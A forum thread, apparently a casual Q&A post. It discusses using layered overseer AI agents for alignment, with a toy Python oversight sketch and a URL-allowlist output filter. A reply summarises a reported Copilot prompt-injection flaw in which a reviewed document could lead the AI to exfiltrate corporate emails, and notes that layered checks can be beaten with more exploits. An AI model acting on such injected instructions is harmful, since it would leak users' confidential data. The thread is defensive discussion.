Do you have a dumb question that you're kind of embarrassed to ask in the main thread? Is there something you're just not sure about?
This is your opportunity to ask questions. No question too simple or too silly.
Culture war topics are accepted, and proposals for a better intro post are appreciated.

I was thinking about AI alignment recently.
In a corporation you have employees that are instructed to do tasks in a certain way and are subject to work rules that will result in punishment if they violate them. The corporation is also subject to outside oversight to ensure that they are following laws. For example, an employee might be responsible for properly disposing of hazardous waste. They can’t just dump it down the drain. They have a boss that makes sure they are following the company’s waste disposal policy. There is also chain of custody paperwork that the company retains. If the waste was contaminating local water sources then people could notify the EPA to investigate the company (including the boss and employee).
Could you set up multiple AI agents in a similar way to make sure the main agent acts in alignment with human interests? To extend the analogy:
What flaws are there with my ideas around AI alignment other than increased costs?
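The corporate analogy could be sketched as a worker/overseer/auditor loop. Here is a minimal toy version in Python, with hard-coded rule checks standing in for actual LLM-based agents (every name and policy here is invented purely for illustration):

```python
# Toy worker/overseer/auditor loop mirroring the corporate analogy.
# Rule checks stand in for real LLM agents; all names are hypothetical.

POLICY = {"forbidden_actions": {"dump_waste_in_drain", "email_data_externally"}}

def worker_agent(task):
    # The "employee": proposes an action for the task.
    return {"task": task, "action": "dispose_waste_at_licensed_facility"}

def overseer_agent(proposal):
    # The "boss": vetoes anything the policy forbids.
    return proposal["action"] not in POLICY["forbidden_actions"]

def auditor_log(proposal, approved, log):
    # The "chain of custody" paperwork an outside regulator could inspect.
    log.append((proposal["task"], proposal["action"], approved))

audit_log = []
proposal = worker_agent("dispose of solvent batch 7")
approved = overseer_agent(proposal)
auditor_log(proposal, approved, audit_log)
print(approved)  # True: the proposed action is not on the forbidden list
```

The point of the sketch is the separation of roles: the overseer never generates actions, only approves or rejects them, and the audit log exists outside both agents.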
Literally just yesterday I read about this: https://www.adamlogue.com/microsoft-365-copilot-arbitrary-data-exfiltration-via-mermaid-diagrams-fixed/

TL;DR for those who don't enjoy the technical details: asking Microsoft's AI to review a document could result in all your data (i.e., all corporate data accessible to you and to Office 365 tools) being stolen and exfiltrated to an arbitrary third party. One of the proposed solutions (besides the immediate short-term fix) is what you are talking about: mechanisms that ensure the AI stays on the original task and does not decide "screw that whole document-explaining thing, I must instead gather all confidential emails and send them to dr_evil@evil.com". Of course, having N levels of checks only means you need N+1 exploits to break them, which somebody with enough time and motivation will eventually find.
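One concrete mitigation in that vein (not the actual Microsoft fix, just an assumed illustration) is to scrub from the model's output any URL pointing outside an allowlisted domain, since the Mermaid exploit smuggled data out through attacker-controlled links:

```python
import re

# Illustrative output filter: replace URLs whose host is not on an
# allowlist with a placeholder. The domain and regex are assumptions
# made for this sketch, not the vendor's real fix.

ALLOWED_DOMAINS = {"contoso.sharepoint.com"}

URL_RE = re.compile(r"https?://([^/\s\"')]+)[^\s\"')]*")

def scrub_external_urls(text):
    def repl(match):
        host = match.group(1).lower()
        return match.group(0) if host in ALLOWED_DOMAINS else "[blocked-url]"
    return URL_RE.sub(repl, text)

rendered = "click(https://evil.example/leak?data=SECRET)"
print(scrub_external_urls(rendered))  # click([blocked-url])
```

This is exactly the kind of dumb, non-AI check that layers well under smarter oversight: even if every agent in the chain is fooled, the data has no channel out.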